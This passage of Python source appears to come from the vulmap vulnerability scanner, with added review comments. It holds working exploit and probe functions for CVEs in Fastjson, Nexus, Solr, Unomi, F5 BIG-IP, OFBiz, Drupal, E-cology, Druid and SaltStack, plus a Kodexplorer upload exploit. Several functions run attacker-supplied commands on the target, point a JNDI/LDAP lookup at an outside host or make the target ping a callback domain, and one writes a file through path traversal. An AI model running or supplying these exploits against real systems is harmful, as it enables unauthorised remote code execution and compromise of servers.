     always receives the fixed "no echo" string plus the dumped response.
     ``dump`` and ``verify`` are defined elsewhere. TLS verification is
     disabled (``verify=False``).

     :param rmi_ldap: value placed verbatim in ``dataSourceName``.
     """
     vul_name = "Fastjson: VER-1247"
     headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
     data = {
         "a": {
             "@type": "java.lang.Class",
             "val": "com.sun.rowset.JdbcRowSetImpl"
         },
         "b": {
             "@type": "com.sun.rowset.JdbcRowSetImpl",
             "dataSourceName": rmi_ldap,
             "autoCommit": True
         }
     }
     data = json.dumps(data)
     try:
         request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False)
         raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         r = "Command Executed Successfully (But No Echo)"
         verify.exploit_print(r, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
 def cve_2020_10199_exp(self, cmd, u, p) -> None:
     """Log in to Nexus with *u*/*p*, then send the CVE-2020-10199 request for *cmd* and print the response.

     Step 1 POSTs base64-encoded credentials to ``/service/rapture/session``
     and extracts ``NXSESSIONID`` from the response headers with a regex.
     Step 2 POSTs ``self.payload_cve_2020_10199`` to
     ``/service/rest/beta/repositories/go/group`` with that session cookie and
     *cmd* in a header literally named ``404``. The raw response text is
     printed; no success check is done. Many intermediates are stored on
     ``self`` (``self.us``, ``self.pa``, ``self.session`` ...). ``dump`` and
     ``verify`` are defined elsewhere.

     :param cmd: value of the ``404`` request header.
     :param u: username, base64-encoded before sending.
     :param p: password, base64-encoded before sending.
     """
     vul_name = "Nexus Repository Manager: CVE-2020-10199"
     self.session_headers = {
         'Connection': 'keep-alive',
         'X-Requested-With': 'XMLHttpRequest',
         'X-Nexus-UI': 'true',
         'User-Agent': self.ua
     }
     try:
         self.us = base64.b64encode(str.encode(u))
         self.pa = base64.b64encode(str.encode(p))
         self.base64user = self.us.decode('ascii')
         self.base64pass = self.pa.decode('ascii')
         self.session_data = {
             'username': self.base64user,
             'password': self.base64pass
         }
         # NOTE(review): inconsistent with the rest of the file -- a fixed
         # timeout of 20 instead of self.timeout, and no verify= argument, so
         # TLS validation is ON for this request and OFF nowhere else here.
         self.request = requests.post(self.url + "/service/rapture/session",
                                      data=self.session_data,
                                      headers=self.session_headers,
                                      timeout=20)
         self.session_str = str(self.request.headers)
         # A failed login yields no cookie; re.search returns None and
         # .group(1) raises AttributeError into the generic error branch.
         self.session = (re.search(r"NXSESSIONID=(.*); Path",
                                   self.session_str).group(1))
         self.rce_headers = {
             'Connection': "keep-alive",
             'NX-ANTI-CSRF-TOKEN': "0.6153568974227819",
             'X-Requested-With': "XMLHttpRequest",
             'X-Nexus-UI': "true",
             'Content-Type': "application/json",
             '404': "" + cmd + "",
             'User-Agent': self.ua,
             'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520;" \
                       "NX-ANTI-CSRF-TOKEN=0.6153568974227819; NXSESSIONID=" + self.session + ""
         }
         # NOTE(review): no timeout here, so a stalled server blocks forever
         # and the Timeout branch below cannot fire for this request.
         request = requests.post(self.url +
                                 "/service/rest/beta/repositories/go/group",
                                 data=self.payload_cve_2020_10199,
                                 headers=self.rce_headers)
         self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(request.text, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
 def cve_2019_0193_poc(self) -> None:
     """Check ``self.url`` for Apache Solr CVE-2019-0193 (DataImportHandler) and report it.

     Fills ``self.vul_info`` with the finding metadata, lists cores via
     ``/solr/admin/cores``, fetches the first core's ``admin/mbeans`` page,
     then POSTs ``self.payload_cve_2019_0193`` (``RECOMMAND`` replaced by a
     URL-quoted ``echo <random md5>``) to that core's ``/dataimport``. There
     is no echo check: a 200 with a resolved core name is reported as
     ``PoC_MaYbE``. ``self.threadLock`` serialises the call. ``random_md5``,
     ``quote``, ``dump`` and ``verify`` are defined elsewhere. TLS
     verification is disabled (``verify=False``).
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace("RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2019-0193"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2019-10-16"
     self.vul_info["vul_vers"] = "< 8.2.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \
                                 "在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制"
     # NOTE(review): unlike the sibling *_poc methods, "cre_date" is not set
     # here -- presumably an omission; confirm what scan_print expects.
     self.vul_info["cre_auth"] = "zhzyker"
     core_name = "null"
     md = random_md5()
     cmd = "echo " + md
     payload = self.payload_cve_2019_0193.replace("RECOMMAND", quote(cmd, 'utf-8'))
     solrhost = self.hostname + ":" + str(self.port)
     headers = {
         'Host': "" + solrhost,
         'User-Agent': self.ua,
         'Accept': "application/json, text/plain, */*",
         'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
         'Accept-Encoding': "zip, deflate",
         'Referer': self.url + "/solr/",
         'Content-type': "application/x-www-form-urlencoded",
         'X-Requested-With': "XMLHttpRequest",
         'Connection': "close"
     }
     urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(urlcore, headers=headers, timeout=self.timeout, verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         # Bare except: an unparsable core listing leaves core_name == "null",
         # which the status check below relies on.
         except:
             pass
         urlconfig = self.url + "/solr/" + str(core_name) + "/admin/mbeans?cat=QUERY&wt=json"
         # The mbeans response is fetched but never inspected.
         request = requests.get(urlconfig, headers=headers, timeout=self.timeout, verify=False)
         url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport"
         request = requests.post(url_cmd, data=payload, headers=headers, timeout=self.timeout, verify=False)
         if request.status_code == 200 and core_name != "null":
             self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoC_MaYbE"
             # NOTE(review): labelled "core name" but holds the full
             # dataimport URL.
             self.vul_info["prt_info"] = "[maybe] [core name:" + url_cmd + "] "
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     # NOTE(review): not in a finally -- if a verify.*_print call raises, the
     # lock is never released.
     self.threadLock.release()
 def cve_2020_13942_poc(self) -> None:
     """Check ``self.url`` for Apache Unomi CVE-2020-13942 and report via ``verify.scan_print``.

     Fills ``self.vul_info`` with the finding metadata, POSTs
     ``self.payload_cve_2020_13942`` with ``RECOMMAND`` replaced by
     ``ping <dns_request() host>`` to ``/context.json``, then consults
     ``dns_result``. An out-of-band hit is ``PoCSuCCeSS``; otherwise the
     response JSON is inspected and a ``/tracker/`` page path in
     ``trackedConditions[0].parameterValues.pagePath`` yields ``PoC_MaYbE``.
     ``self.threadLock`` serialises the call; ``self.payload`` and
     ``self.headers`` are overwritten. ``dns_request``, ``dns_result``,
     ``dump`` and ``verify`` are defined elsewhere. TLS verification is
     disabled (``verify=False``).
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace(
         "RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "Apache Unomi remote code execution"
     self.vul_info["vul_numb"] = "CVE-2020-13942"
     self.vul_info["vul_apps"] = "Unomi"
     self.vul_info["vul_date"] = "2020-11-23"
     self.vul_info["vul_vers"] = "< 1.5.2"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \
                                 "漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \
                                 "攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。"
     self.vul_info["cre_date"] = "2021-01-28"
     self.vul_info["cre_auth"] = "zhzyker"
     # Out-of-band marker: the command only pings the callback host, so the
     # success signal is the DNS lookup, not any echo in the HTTP response.
     md = dns_request()
     cmd = "ping " + md
     self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
     self.headers = {
         'User-Agent': self.ua,
         'Accept': '*/*',
         'Connection': 'close',
         'Content-Type': 'application/json'
     }
     try:
         req = requests.post(self.url + "/context.json",
                             data=self.payload,
                             headers=self.headers,
                             timeout=self.timeout,
                             verify=False)
         if dns_result(md):
             self.vul_info["vul_data"] = dump.dump_all(req).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[dns] [cmd:" + cmd + "]"
         else:
             # Non-JSON body or missing keys raise here and skip scan_print
             # entirely (caught by the generic handler below).
             rep = list(
                 json.loads(req.text)
                 ["trackedConditions"])[0]["parameterValues"]["pagePath"]
             if r"/tracker/" in rep:
                 self.vul_info["vul_data"] = dump.dump_all(req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info["prt_info"] = "[maybe]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     # `error` is bound but never reported; the error detail is lost.
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     # NOTE(review): not in a finally -- if a verify.*_print call raises, the
     # lock is never released.
     self.threadLock.release()
 def cve_2021_22986_poc(self) -> None:
     """Probe for CVE-2021-22986 (F5 BIG-IP iControl REST) and report via verify.scan_print.

     One POST is sent to ``/mgmt/tm/util/bash`` asking the target to ``echo`` a
     random marker.  The verdict is ``PoCSuCCeSS`` only when the response is a
     200 whose ``commandResult`` contains that marker; otherwise ``prt_resu``
     stays ``"null"``.  The whole body runs while holding ``self.threadLock``.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2021-22986"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
     self.vul_info["vul_numb"] = "CVE-2021-22986"
     # NOTE(review): "Flink" disagrees with prt_name/vul_name above (F5 BIG-IP);
     # this looks like a copy-paste slip in the metadata.
     self.vul_info["vul_apps"] = "Flink"
     self.vul_info["vul_date"] = "2021-03-11"
     self.vul_info["vul_vers"] = "< 16.0.1"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "BIG-IP存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过BIG-IP" \
                                 "管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令," \
                                 "创建或删除文件以及替换服务。该中断只能通过控制界面利用,而不能通过数据界面利用。"
     self.vul_info["cre_date"] = "2021-03-20"
     self.vul_info["cre_auth"] = "zhzyker"
     # Fixed request fingerprint: "Basic YWRtaW46" is base64 of "admin:" (user
     # admin, empty password) and X-F5-Auth-Token is sent empty.  Both values
     # are constant, which makes this probe easy to match in access logs.
     headers = {
         'User-Agent': self.ua,
         'Accept': '*/*',
         'Connection': 'close',
         'Authorization': 'Basic YWRtaW46',
         'X-F5-Auth-Token': '',
         'Content-Type': 'application/json'
     }
     # Random marker so a static page cannot satisfy the check.
     md = random_md5()
     cmd = "echo " + md
     data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace(
         "RECOMMAND", cmd)
     url = urljoin(self.url, "/mgmt/tm/util/bash")
     try:
         request = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         # Parsed before the status check: a non-JSON body, or one without
         # "commandResult", raises here and ends up in error_print below
         # instead of being reported as a clean negative result.
         r = json.loads(request.text)["commandResult"]
         if request.status_code == 200:
             # misinformation() is a project helper; presumably it strips
             # reflected request input so an echoed body is not mistaken for
             # command output -- confirm against its definition.
             if md in misinformation(r, md):
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
                 self.vul_info["vul_payd"] = data
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     # Reached on every path handled above; an exception not derived from
     # Exception (e.g. KeyboardInterrupt) would skip this release.
     self.threadLock.release()
    def cve_2021_26295_exp(self, cmd: str) -> None:
        """Exploit helper for CVE-2021-26295 (Apache OFBiz ``/webtools/control/SOAPService``).

        ``cmd`` is hex-encoded and substituted for ``RECOMMAND`` in two stored
        payload templates.  The first template is POSTed unconditionally; the
        second only when the first response contains ``cus-obj``.  There is no
        output channel: the printed verdict is derived from the last HTTP
        status alone, so "Executed Successfully" means "got a 200", not that
        ``cmd`` actually ran.
        """
        vul_name = "Apache OFBiz: CVE-2021-26295"
        headers = {
            'User-Agent': self.ua,
            'Content-Type': 'text/xml',
            'Connection': 'close'
        }

        def _trans(s):
            # Lower-case hex string of the bytes in ``s`` (two digits per
            # byte); the outer "%s" % is a no-op wrapper around the join.
            return "%s" % ''.join('%.2x' % x for x in s)

        try:
            # Despite the dns_* names there is no DNS step here; this is just
            # the UTF-8 bytes of ``cmd`` as hex.
            dns_data = bytes(cmd, encoding="utf8")
            dns_hex = _trans(dns_data)
            data = self.payload_cve_2021_26295_exp_1.replace(
                "RECOMMAND", dns_hex)
            url = urljoin(self.url, "/webtools/control/SOAPService")
            request = requests.post(url,
                                    data=data,
                                    headers=headers,
                                    timeout=self.timeout,
                                    verify=False)
            # "cus-obj" in the reply is the trigger for sending stage two.
            if r"cus-obj" in request.text:
                data = self.payload_cve_2021_26295_exp_2.replace(
                    "RECOMMAND", dns_hex)
                request = requests.post(url,
                                        data=data,
                                        headers=headers,
                                        timeout=self.timeout,
                                        verify=False)
            # Whichever request ran last is what gets dumped and judged.
            self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
            if request.status_code == 200:
                r = "Command Executed Successfully (But No Echo)"
            else:
                r = "Command Executed Failed... ..."
            verify.exploit_print(r, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception as e:
            # ``e`` is not reported; only the generic error line is printed.
            verify.error_print(vul_name)
 def upload(self,address, port, filename, path = '/usr/www/' ):
     """Upload ``filename`` to ``http://address:port/include/upload.php`` (Python 2 code).

     ``path`` is passed through unchanged as the ``targetDir`` query
     parameter.  Returns True whenever the POST completed, even if the reply
     was not the expected JSON-RPC success string (that case only prints a
     warning); returns False only when an exception was raised.
     """
     url = "http://%s:%d/include/upload.php?targetDir=%s" % ( address, port, path )
     try:
         # The file handle is never closed explicitly; it is left to the GC.
         files = { 'file': open( filename, 'rb' ) }
         cookies = { 'kod_name': '1' } # LOL :D
         # No timeout is set, so an unresponsive server blocks this call.
         r = requests.post(url, files=files, cookies=cookies)
         if r.text != '{"jsonrpc" : "2.0", "result" : null, "id" : "id"}':
             print "[+] Unexpected response, exploit might not work:\n%s\n" % r.text
         return True
     except Exception as e:
         print "[-] ERROR: %s" % e
     return False
 def fastjson_1262_poc(self) -> None:
     """Probe for the Fastjson <= 1.2.62 autoType deserialization issue via an out-of-band DNS check.

     POSTs a JSON body whose ``@type`` is ``JndiConverter`` with an ``ldap://``
     URL pointing at a DNS token from ``dns_request()``.  The target is
     reported as ``PoCSuCCeSS`` only if ``dns_result()`` later sees a lookup
     for that token; the HTTP response itself is never inspected.  Runs under
     ``self.threadLock``.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Fastjson: 1.2.62"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
     self.vul_info["vul_numb"] = "null"
     self.vul_info["vul_apps"] = "Fastjson"
     self.vul_info["vul_date"] = "2019-10-07"
     self.vul_info["vul_vers"] = "<= 1.2.62"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \
                                 "(autoType功能默认关闭),另建议将JDK升级到最新版本。"
     self.vul_info["cre_date"] = "2021-01-21"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
     # The DNS token doubles as the LDAP host in the payload.
     md = dns_request()
     dns = md
     data = {
         "@type": "org.apache.xbean.propertyeditor.JndiConverter",
         "AsText": "ldap://" + dns + "//exploit"
     }
     data = json.dumps(data)
     try:
         try:
             request = requests.post(self.url,
                                     data=data,
                                     headers=headers,
                                     timeout=self.timeout,
                                     verify=False)
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
         except:
             # Bare except: every error from the POST (including Timeout and
             # ConnectionError) is swallowed here, so the outer handlers
             # below never see them for this request and the DNS check
             # still runs.
             pass
         if dns_result(md):
             # NOTE(review): the stored payload string ends in "] ", which
             # looks copied from the prt_info line below.
             self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
             verify.scan_print(self.vul_info)
         else:
             # Same print call; only the success fields differ.
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
파일: Drupal.py 프로젝트: zhzyker/vulmap
 def cve_2019_6340_poc(self) -> None:
     """Probe for CVE-2019-6340 (Drupal core RESTful unserialize) and report via verify.scan_print.

     Fills the stored ``payload_cve_2019_6340`` template with a random
     ``echo`` marker and POSTs it to ``/node/?_format=hal_json``.  Success is
     decided solely by the marker appearing in the response body; the status
     code is not checked.  Runs under ``self.threadLock`` and writes
     ``self.path``, ``self.cmd_len``, ``self.payload`` and ``self.headers`` as
     side effects.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Drupal: CVE-2019-6340"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "drupal core restful remote code execution"
     self.vul_info["vul_numb"] = "CVE-2019-6340"
     self.vul_info["vul_apps"] = "Drupal"
     self.vul_info["vul_date"] = "2019-02-22"
     self.vul_info["vul_vers"] = "< 8.6.10"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "POST/PATCH 请求,在进行 REST API 操作的过程中,会将未经安全过滤的参数内容带入unserialize " \
                                 "函数而触发反序列化漏洞,进而导致任意代码执行。"
     self.vul_info["cre_date"] = "2021-01-29"
     self.vul_info["cre_auth"] = "zhzyker"
     self.path = "/node/?_format=hal_json"
     md = random_md5()
     cmd = "echo " + md
     # The template takes (length, command, url); presumably the length feeds
     # a serialized-string field -- confirm against the template definition.
     self.cmd_len = len(cmd)
     self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
                                                  self.url)
     self.headers = {
         'User-Agent': self.ua,
         'Connection': "close",
         'Content-Type': "application/hal+json",
         'Accept': "*/*",
         'Cache-Control': "no-cache"
     }
     try:
         request = requests.post(self.url + self.path,
                                 data=self.payload,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
         # misinformation() is a project helper; presumably it filters
         # reflected input before the marker test -- confirm.
         if md in misinformation(request.text, md):
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             # NOTE(review): this overwrites vul_urls with the payload while
             # vul_payd stays "null"; the other PoCs in this file store the
             # payload in vul_payd.
             self.vul_info["vul_urls"] = self.payload
             self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
파일: Ecology.py 프로젝트: zhzyker/vulmap
 def time_2021_0515_poc(self) -> None:
     """Probe for the E-cology OA WorkflowServiceXml RCE (time-2021-0515) and report via verify.scan_print.

     POSTs the stored ``payload_time_2021_0515`` body to
     ``/services%20/WorkflowServiceXml`` with the command carried in a ``cmd``
     request header.  Success requires both the random marker in the response
     body and an HTTP 500 status.  Runs under ``self.threadLock``.
     """
     self.threadLock.acquire()
     self.vul_info[
         "prt_name"] = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "E-cology OA WorkflowServiceXml RCE"
     # NOTE(review): "0415" disagrees with prt_name and vul_date (0515 /
     # 2021-05-15); likely a typo.
     self.vul_info["vul_numb"] = "time-2021-0415"
     self.vul_info["vul_apps"] = "E-cology"
     self.vul_info["vul_date"] = "2021-05-15"
     self.vul_info["vul_vers"] = "E-cology <= 9.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "RCE"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "The WorkflowServiceXml interface can be accessed without authorization. The attacker can call this interface to construct a specific HTTP request to bypass the security restrictions of E-cology itself to achieve remote command execution."
     self.vul_info["cre_date"] = "2021-05-19"
     self.vul_info["cre_auth"] = "zhzyker"
     # The encoded space in "/services%20/" is sent literally as part of the
     # path; presumably this is how the access restriction mentioned in
     # vul_desc is sidestepped.  A request path containing "services%20/" is
     # a useful log signature for this probe.
     url = urljoin(self.url, "/services%20/WorkflowServiceXml")
     md = random_md5()
     cmd = "echo " + md
     # The command travels in a custom "cmd" header, not in the SOAP body.
     headers = {
         'User-Agent': self.ua,
         'SOAPAction': '""',
         'cmd': cmd,
         "Content-Type": "text/xml;charset=UTF-8"
     }
     data = self.payload_time_2021_0515
     try:
         request = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         #print(self.url + "  " + str(request.status_code) + request.text)
         # Both conditions are required: marker echoed AND a 500 status.
         if md in misinformation(request.text,
                                 md) and request.status_code == 500:
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = data
             self.vul_info["prt_info"] = "[rce: " + url + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
 def cve_2021_25646_poc(self) -> None:
     """Probe for CVE-2021-25646 (Apache Druid ``/druid/indexer/v1/sampler``) via an out-of-band DNS check.

     Fills the stored ``payload_cve_2021_25646`` template with ``ping <token>``
     and POSTs it to the sampler endpoint.  Success is decided only by
     ``dns_result()`` seeing a lookup for the token; the HTTP response is not
     inspected.  Runs under ``self.threadLock``.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2021-25646"
     self.vul_info["vul_apps"] = "Druid"
     self.vul_info["vul_date"] = "2021-02-01"
     self.vul_info["vul_vers"] = "< 0.20.1"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \
                                 "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \
                                 "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \
                                 "攻击者可直接构造恶意请求执行任意代码,控制服务器。"
     self.vul_info["cre_date"] = "2021-02-03"
     self.vul_info["cre_auth"] = "zhzyker"
     url = urljoin(self.url, "/druid/indexer/v1/sampler")
     # Unlike the other PoCs in this file, this one sends keep-alive and a
     # browser-style Accept header.
     headers = {
         'Content-Type': 'application/json',
         'User-Agent': self.ua,
         'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
         'Connection': 'keep-alive'
     }
     # The DNS token is the only success channel: a ping to it from the
     # target is what dns_result() looks for.
     md = dns_request()
     cmd = "ping " + md
     data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
     try:
         request = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         if dns_result(md):
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["vul_payd"] = data
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
파일: SaltStack.py 프로젝트: zhzyker/vulmap
 def cve_2021_25282_poc(self) -> None:
     """Probe for CVE-2021-25282 (SaltStack salt-api ``wheel_async``) and report via verify.scan_print.

     POSTs a ``pillar_roots.write`` job with a traversal ``path`` to ``/run``.
     The job is asynchronous, so the response can only confirm that the job
     was accepted (a ``salt/wheel`` tag containing the jid); the verdict is
     therefore ``PoC_MaYbE``, never ``PoCSuCCeSS``.  On a vulnerable target this
     probe writes a file (``/tmp/vuln``) rather than merely reading.  Runs
     under ``self.threadLock``.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "SaltStack: CVE-2021-25282"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "SaltStack 任意文件写入漏洞"
     self.vul_info["vul_numb"] = "CVE-2021-25282"
     self.vul_info["vul_apps"] = "SaltStack"
     self.vul_info["vul_date"] = "2021-02-25"
     self.vul_info["vul_vers"] = "< 3002.5"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "未经授权的访问wheel_async,通过salt-api可以执行任意代码/命令。"
     self.vul_info["cre_date"] = "2021-03-02"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = {
         "User-agent": self.ua,
         "Content-Type": "application/json",
         "Connection": "close"
     }
     url = self.url + "/run"
     # Traversal path; the intended destination on the target is /tmp/vuln.
     path = "../../../../../../../../../tmp/vuln"
     # eauth "auto" with no credentials: the request carries no username or
     # password at all.
     data = {
         'eauth': 'auto',
         'client': 'wheel_async',
         'fun': 'pillar_roots.write',
         'data': 'vuln_cve_2021_25282',
         'path': path
     }
     data = json.dumps(data)
     try:
         r = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False)
         # The body is parsed twice; a missing key or non-JSON reply raises
         # and is reported by error_print below.
         tag = list(json.loads(r.text)["return"])[0]["tag"]
         jid = list(json.loads(r.text)["return"])[0]["jid"]
         if r"salt/wheel" in tag:
             if jid in tag:
                 self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore')
